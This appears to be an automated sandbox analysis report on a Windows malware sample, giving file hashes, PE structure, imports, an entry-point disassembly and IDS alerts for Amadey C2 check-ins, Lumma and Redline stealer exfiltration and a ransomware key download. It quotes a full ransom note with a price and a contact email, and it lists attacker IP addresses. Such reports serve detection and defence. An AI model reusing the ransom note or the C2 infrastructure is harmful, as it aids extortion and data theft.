Entropy (8bit):	4.874792337269828
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWyrmFRqrl3W4kA+GT/kF5M2/kLw3KTJRybGQ:WZHfv0p6WyrPFWrDGT0f/krbybH
MD5:	0FD2F9DEF16C2AB15CA8232B3081E019
SHA1:	B8AD094FFBB141352F626DB0A9ED02BACEE05EB0
SHA-256:	B3469C3CDE8A6898506ED59E26B302D21564F2361E02C23590672A7611253B4B
SHA-512:	58B072E055DB27A65AAB2117274541D64EC8847881F8DEC1A280BA8C597D87A4D80DF473403A628CCA1AB1BB9E635D9B35DE724C5E82F3DC381BE37870C110A8
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-xN3VuzQl0a..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.753904568661947
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	244'736 bytes
MD5:	178ae4687ee8a5761d2003dfd45efdce
SHA1:	23fbe6bb9b67eb068b746b1518da3c3b91c5e219
SHA256:	9f6b062d11dfeb51158b9d133c7ad76051dfef5678f6af292e87dd464c6aa50f
SHA512:	57e20eeb88f4e190036082ae567b3cba3bfa82f63c7010c7721546268950367666ff399e2f9790ad056e598df840bbb8d130bd62a817f88b7a939ffe8150ddf2
SSDEEP:	3072:azmo3RLrcfbfhlxEPxfnbo7lwThYkoALvY2z5Lf1cZ0pg0Tr:j+Nrcjhkb2lMh/dfeAT
TLSH:	D2348D1BA699EC61C81646F28D3DC5F8762FB951CE492BE732187FAF3871172D263210
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1bc.1bc.1bc./0...bc./0..'bc./0...bc.....6bc.1bb..bc./0..0bc./0..0bc./0..0bc.Rich1bc.........................PE..L...\|[.d...

File Icon


Icon Hash:	4955515125494d19

Static PE Info

General

Entrypoint:	0x403e79
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64145B7C [Fri Mar 17 12:22:20 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	dc736a16013f46a3a4123f7d56e394d3

Entrypoint Preview

Instruction
call 00007FB4D47B99F4h
jmp 00007FB4D47B58EDh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007FB4D47B5AD5h
call 00007FB4D47B7DF2h
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [00427DB0h]
je 00007FB4D47B5A84h
mov ecx, dword ptr [00427CCCh]
test dword ptr [eax+70h], ecx
jne 00007FB4D47B5A79h
call 00007FB4D47BAD01h
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [00427BD0h]
je 00007FB4D47B5A88h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [00427CCCh]
test dword ptr [eax+70h], ecx
jne 00007FB4D47B5A7Ah
call 00007FB4D47BA575h
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007FB4D47B5A86h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007FB4D47B5A7Ch
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [00428DB0h], eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov eax, dword ptr [00427688h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
and dword ptr [ebp-00000328h], 00000000h
push ebx
push 0000004Ch
lea eax, dword ptr [ebp-00000324h]
push 00000000h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d34	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19e000	0x11558	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1b0000	0xbb8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1220	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2e20	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1dc	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2582a	0x25a00	False	0.8052585132890365	data	7.624056923243651	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x27000	0x176278	0x1e00	False	0.240625	data	2.533708084383066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x19e000	0x11558	0x11600	False	0.3266215152877698	data	4.437610205205125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1b0000	0x2880	0x2a00	False	0.24088541666666666	data	2.6129121864451426	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x1a97a0	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0	English	United States	0.1948529411764706
RT_CURSOR	0x1a9ad0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	English	United States	0.33223684210526316
RT_CURSOR	0x1a9c28	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.2953091684434968
RT_CURSOR	0x1aaad0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.46705776173285196
RT_CURSOR	0x1ab378	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.5361271676300579
RT_CURSOR	0x1ab910	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.27238805970149255
RT_CURSOR	0x1ac7b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.375
RT_CURSOR	0x1ad060	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.5057803468208093
RT_CURSOR	0x1ad5f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.30943496801705755
RT_CURSOR	0x1ae4a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.427797833935018
RT_CURSOR	0x1aed48	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.5469653179190751
RT_ICON	0x19e670	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3619402985074627
RT_ICON	0x19f518	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.4756317689530686
RT_ICON	0x19fdc0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.46255186721991703
RT_ICON	0x1a2368	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.47068480300187615
RT_ICON	0x1a3410	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.49645390070921985
RT_ICON	0x1a38c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3678038379530917
RT_ICON	0x1a4770	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.45577617328519854
RT_ICON	0x1a5018	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	English	United States	0.4608294930875576
RT_ICON	0x1a56e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.45664739884393063
RT_ICON	0x1a5c48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.2670124481327801
RT_ICON	0x1a81f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.30909943714821764
RT_ICON	0x1a9298	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.35904255319148937
RT_ACCELERATOR	0x1a9768	0x38	data	English	United States	0.8928571428571429
RT_GROUP_CURSOR	0x1a9c00	0x22	data	English	United States	1.0294117647058822
RT_GROUP_CURSOR	0x1ab8e0	0x30	data	English	United States	0.9375
RT_GROUP_CURSOR	0x1ad5c8	0x30	data	English	United States	0.9375
RT_GROUP_CURSOR	0x1af2b0	0x30	data	English	United States	0.9375
RT_GROUP_ICON	0x1a3878	0x4c	data	English	United States	0.75
RT_GROUP_ICON	0x1a9700	0x68	data	English	United States	0.7019230769230769
RT_VERSION	0x1af2e0	0x278	data	English	United States	0.5205696202531646

Imports

DLL	Import
KERNEL32.dll	WriteConsoleInputW, GetConsoleAliasesLengthW, PeekNamedPipe, WriteConsoleOutputCharacterA, LoadResource, AddConsoleAliasW, SetVolumeMountPointW, FreeEnvironmentStringsA, GetProcessPriorityBoost, GetTickCount, GetCompressedFileSizeW, GlobalAlloc, LoadLibraryW, IsProcessInJob, GetSystemWindowsDirectoryA, EnumSystemCodePagesA, GetNamedPipeInfo, GetFileAttributesW, GetVolumePathNameA, GetLargestConsoleWindowSize, ReleaseActCtx, GetLastError, GetProcAddress, VirtualAlloc, PeekConsoleInputW, FillConsoleOutputCharacterA, BackupWrite, SetComputerNameA, GlobalFree, CreateHardLinkW, GetNumberFormatW, AddAtomW, RemoveDirectoryW, SetFileApisToANSI, BeginUpdateResourceA, OpenJobObjectW, FoldStringW, GetOEMCP, FindNextFileA, _lopen, GetWindowsDirectoryW, GetCurrentProcessId, GlobalAddAtomW, OpenFileMappingA, ReadFile, GetProcessHeap, BeginUpdateResourceW, GetComputerNameA, HeapFree, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, RaiseException, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, RtlUnwind, WriteFile, GetStdHandle, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, IsValidCodePage, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, LoadLibraryA, CloseHandle, CreateFileA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, SetEndOfFile
USER32.dll	GetWindowTextLengthA, LoadMenuW, ChangeDisplaySettingsA, CharToOemBuffA
GDI32.dll	GetCharABCWidthsFloatA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.5104.21.34.16649966802048094 10/13/23-15:22:56.421707	TCP	2048094	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration	49966	80	192.168.2.5	104.21.34.166
192.168.2.579.137.192.1849833802027700 10/13/23-15:22:05.141523	TCP	2027700	ET TROJAN Amadey CnC Check-In	49833	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849876802027700 10/13/23-15:22:20.097399	TCP	2027700	ET TROJAN Amadey CnC Check-In	49876	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849974802027700 10/13/23-15:22:59.669624	TCP	2027700	ET TROJAN Amadey CnC Check-In	49974	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849989802027700 10/13/23-15:23:10.080571	TCP	2027700	ET TROJAN Amadey CnC Check-In	49989	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849781802027700 10/13/23-15:21:37.316404	TCP	2027700	ET TROJAN Amadey CnC Check-In	49781	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849928802027700 10/13/23-15:22:38.748201	TCP	2027700	ET TROJAN Amadey CnC Check-In	49928	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850002802027700 10/13/23-15:23:19.945356	TCP	2027700	ET TROJAN Amadey CnC Check-In	50002	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850030802027700 10/13/23-15:23:40.731674	TCP	2027700	ET TROJAN Amadey CnC Check-In	50030	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850020802027700 10/13/23-15:23:32.989492	TCP	2027700	ET TROJAN Amadey CnC Check-In	50020	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849768802027700 10/13/23-15:21:25.642996	TCP	2027700	ET TROJAN Amadey CnC Check-In	49768	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849866802027700 10/13/23-15:22:15.139270	TCP	2027700	ET TROJAN Amadey CnC Check-In	49866	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850017802027700 10/13/23-15:23:31.190076	TCP	2027700	ET TROJAN Amadey CnC Check-In	50017	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849771802027700 10/13/23-15:21:28.483797	TCP	2027700	ET TROJAN Amadey CnC Check-In	49771	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849999802027700 10/13/23-15:23:18.071741	TCP	2027700	ET TROJAN Amadey CnC Check-In	49999	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849765802044623 10/13/23-15:21:23.868578	TCP	2044623	ET TROJAN Amadey Bot Activity (POST)	49765	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849805802027700 10/13/23-15:21:51.890845	TCP	2027700	ET TROJAN Amadey CnC Check-In	49805	80	192.168.2.5	79.137.192.18
14.33.209.147192.168.2.580497342036335 10/13/23-15:21:09.518902	TCP	2036335	ET TROJAN Win32/Filecoder.STOP Variant Public Key Download	80	49734	14.33.209.147	192.168.2.5
192.168.2.579.137.192.1849984802027700 10/13/23-15:23:06.466457	TCP	2027700	ET TROJAN Amadey CnC Check-In	49984	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850009802027700 10/13/23-15:23:25.466259	TCP	2027700	ET TROJAN Amadey CnC Check-In	50009	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849788802027700 10/13/23-15:21:41.676174	TCP	2027700	ET TROJAN Amadey CnC Check-In	49788	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849800802027700 10/13/23-15:21:49.276813	TCP	2027700	ET TROJAN Amadey CnC Check-In	49800	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850010802027700 10/13/23-15:23:26.406474	TCP	2027700	ET TROJAN Amadey CnC Check-In	50010	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850027802027700 10/13/23-15:23:39.812139	TCP	2027700	ET TROJAN Amadey CnC Check-In	50027	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850040802027700 10/13/23-15:23:48.027782	TCP	2027700	ET TROJAN Amadey CnC Check-In	50040	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850045802027700 10/13/23-15:23:51.738181	TCP	2027700	ET TROJAN Amadey CnC Check-In	50045	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850063802027700 10/13/23-15:24:04.755356	TCP	2027700	ET TROJAN Amadey CnC Check-In	50063	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850025802027700 10/13/23-15:23:38.010785	TCP	2027700	ET TROJAN Amadey CnC Check-In	50025	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849841802027700 10/13/23-15:22:07.796114	TCP	2027700	ET TROJAN Amadey CnC Check-In	49841	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849868802027700 10/13/23-15:22:16.312514	TCP	2027700	ET TROJAN Amadey CnC Check-In	49868	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850019802027700 10/13/23-15:23:32.109182	TCP	2027700	ET TROJAN Amadey CnC Check-In	50019	80	192.168.2.5	79.137.192.18
192.168.2.5172.67.144.24549825802048094 10/13/23-15:22:03.609185	TCP	2048094	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration	49825	80	192.168.2.5	172.67.144.245
192.168.2.579.137.192.1849896802027700 10/13/23-15:22:28.282661	TCP	2027700	ET TROJAN Amadey CnC Check-In	49896	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849798802027700 10/13/23-15:21:48.432808	TCP	2027700	ET TROJAN Amadey CnC Check-In	49798	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850055802027700 10/13/23-15:23:59.380970	TCP	2027700	ET TROJAN Amadey CnC Check-In	50055	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849760802044623 10/13/23-15:21:22.457553	TCP	2044623	ET TROJAN Amadey Bot Activity (POST)	49760	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849987802027700 10/13/23-15:23:08.261340	TCP	2027700	ET TROJAN Amadey CnC Check-In	49987	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850050802027700 10/13/23-15:23:55.610977	TCP	2027700	ET TROJAN Amadey CnC Check-In	50050	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849783802027700 10/13/23-15:21:39.058351	TCP	2027700	ET TROJAN Amadey CnC Check-In	49783	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849982802027700 10/13/23-15:23:04.312997	TCP	2027700	ET TROJAN Amadey CnC Check-In	49982	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850058802027700 10/13/23-15:24:01.165708	TCP	2027700	ET TROJAN Amadey CnC Check-In	50058	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849908802027700 10/13/23-15:22:33.383063	TCP	2027700	ET TROJAN Amadey CnC Check-In	49908	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849863802027700 10/13/23-15:22:14.259828	TCP	2027700	ET TROJAN Amadey CnC Check-In	49863	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850053802027700 10/13/23-15:23:58.476211	TCP	2027700	ET TROJAN Amadey CnC Check-In	50053	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850061802027700 10/13/23-15:24:03.866672	TCP	2027700	ET TROJAN Amadey CnC Check-In	50061	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849803802027700 10/13/23-15:21:50.994711	TCP	2027700	ET TROJAN Amadey CnC Check-In	49803	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849874802027700 10/13/23-15:22:19.198721	TCP	2027700	ET TROJAN Amadey CnC Check-In	49874	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849791802027700 10/13/23-15:21:43.374724	TCP	2027700	ET TROJAN Amadey CnC Check-In	49791	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849879802027700 10/13/23-15:22:21.876808	TCP	2027700	ET TROJAN Amadey CnC Check-In	49879	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849888802027700 10/13/23-15:22:25.611074	TCP	2027700	ET TROJAN Amadey CnC Check-In	49888	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849827802027700 10/13/23-15:22:02.484088	TCP	2027700	ET TROJAN Amadey CnC Check-In	49827	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849980802027700 10/13/23-15:23:02.438820	TCP	2027700	ET TROJAN Amadey CnC Check-In	49980	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849818802027700 10/13/23-15:21:59.765202	TCP	2027700	ET TROJAN Amadey CnC Check-In	49818	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850014802027700 10/13/23-15:23:29.384442	TCP	2027700	ET TROJAN Amadey CnC Check-In	50014	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849949802027700 10/13/23-15:22:46.856478	TCP	2027700	ET TROJAN Amadey CnC Check-In	49949	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849935802027700 10/13/23-15:22:41.369435	TCP	2027700	ET TROJAN Amadey CnC Check-In	49935	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849811802027700 10/13/23-15:21:55.404458	TCP	2027700	ET TROJAN Amadey CnC Check-In	49811	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849996802027700 10/13/23-15:23:15.429834	TCP	2027700	ET TROJAN Amadey CnC Check-In	49996	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849831802027700 10/13/23-15:22:04.252548	TCP	2027700	ET TROJAN Amadey CnC Check-In	49831	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849846802027700 10/13/23-15:22:08.725831	TCP	2027700	ET TROJAN Amadey CnC Check-In	49846	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849872802027700 10/13/23-15:22:18.269417	TCP	2027700	ET TROJAN Amadey CnC Check-In	49872	80	192.168.2.5	79.137.192.18
34.143.166.163192.168.2.580497192037771 10/13/23-15:20:45.479212	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49719	34.143.166.163	192.168.2.5
192.168.2.579.137.192.1849961802027700 10/13/23-15:22:53.278646	TCP	2027700	ET TROJAN Amadey CnC Check-In	49961	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850052802027700 10/13/23-15:23:57.510920	TCP	2027700	ET TROJAN Amadey CnC Check-In	50052	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850015802027700 10/13/23-15:23:30.287697	TCP	2027700	ET TROJAN Amadey CnC Check-In	50015	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850056802027700 10/13/23-15:24:00.271518	TCP	2027700	ET TROJAN Amadey CnC Check-In	50056	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850033802027700 10/13/23-15:23:43.497769	TCP	2027700	ET TROJAN Amadey CnC Check-In	50033	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849776802027700 10/13/23-15:21:33.032973	TCP	2027700	ET TROJAN Amadey CnC Check-In	49776	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849901802027700 10/13/23-15:22:30.071196	TCP	2027700	ET TROJAN Amadey CnC Check-In	49901	80	192.168.2.5	79.137.192.18
192.168.2.551.255.152.13249726360112043231 10/13/23-15:21:22.521434	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49726	36011	192.168.2.5	51.255.152.132
192.168.2.579.137.192.1849770802027700 10/13/23-15:21:26.821669	TCP	2027700	ET TROJAN Amadey CnC Check-In	49770	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849812802027700 10/13/23-15:21:56.269499	TCP	2027700	ET TROJAN Amadey CnC Check-In	49812	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849995802027700 10/13/23-15:23:14.519824	TCP	2027700	ET TROJAN Amadey CnC Check-In	49995	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849977802027700 10/13/23-15:23:00.587433	TCP	2027700	ET TROJAN Amadey CnC Check-In	49977	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849830802027700 10/13/23-15:22:03.350000	TCP	2027700	ET TROJAN Amadey CnC Check-In	49830	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849951802027700 10/13/23-15:22:47.744869	TCP	2027700	ET TROJAN Amadey CnC Check-In	49951	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849942802027700 10/13/23-15:22:44.119537	TCP	2027700	ET TROJAN Amadey CnC Check-In	49942	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850043802027700 10/13/23-15:23:50.801175	TCP	2027700	ET TROJAN Amadey CnC Check-In	50043	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849890802027700 10/13/23-15:22:26.527594	TCP	2027700	ET TROJAN Amadey CnC Check-In	49890	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849795802027700 10/13/23-15:21:46.736624	TCP	2027700	ET TROJAN Amadey CnC Check-In	49795	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850046802027700 10/13/23-15:23:52.657875	TCP	2027700	ET TROJAN Amadey CnC Check-In	50046	80	192.168.2.5	79.137.192.18
192.168.2.5187.18.108.15849738802036333 10/13/23-15:21:09.695197	TCP	2036333	ET TROJAN Win32/Vodkagats Loader Requesting Payload	49738	80	192.168.2.5	187.18.108.158
192.168.2.5172.67.144.24549911802048094 10/13/23-15:22:34.163386	TCP	2048094	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration	49911	80	192.168.2.5	172.67.144.245
192.168.2.579.137.192.1849881802027700 10/13/23-15:22:22.746398	TCP	2027700	ET TROJAN Amadey CnC Check-In	49881	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849792802027700 10/13/23-15:21:44.985008	TCP	2027700	ET TROJAN Amadey CnC Check-In	49792	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849917802027700 10/13/23-15:22:36.079538	TCP	2027700	ET TROJAN Amadey CnC Check-In	49917	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849932802027700 10/13/23-15:22:40.485008	TCP	2027700	ET TROJAN Amadey CnC Check-In	49932	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849967802027700 10/13/23-15:22:56.947274	TCP	2027700	ET TROJAN Amadey CnC Check-In	49967	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849837802027700 10/13/23-15:22:06.032791	TCP	2027700	ET TROJAN Amadey CnC Check-In	49837	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849789802027700 10/13/23-15:21:42.529353	TCP	2027700	ET TROJAN Amadey CnC Check-In	49789	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850024802027700 10/13/23-15:23:36.718762	TCP	2027700	ET TROJAN Amadey CnC Check-In	50024	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850065802027700 10/13/23-15:24:06.609516	TCP	2027700	ET TROJAN Amadey CnC Check-In	50065	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849809802027700 10/13/23-15:21:54.535328	TCP	2027700	ET TROJAN Amadey CnC Check-In	49809	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850059802027700 10/13/23-15:24:02.078548	TCP	2027700	ET TROJAN Amadey CnC Check-In	50059	80	192.168.2.5	79.137.192.18
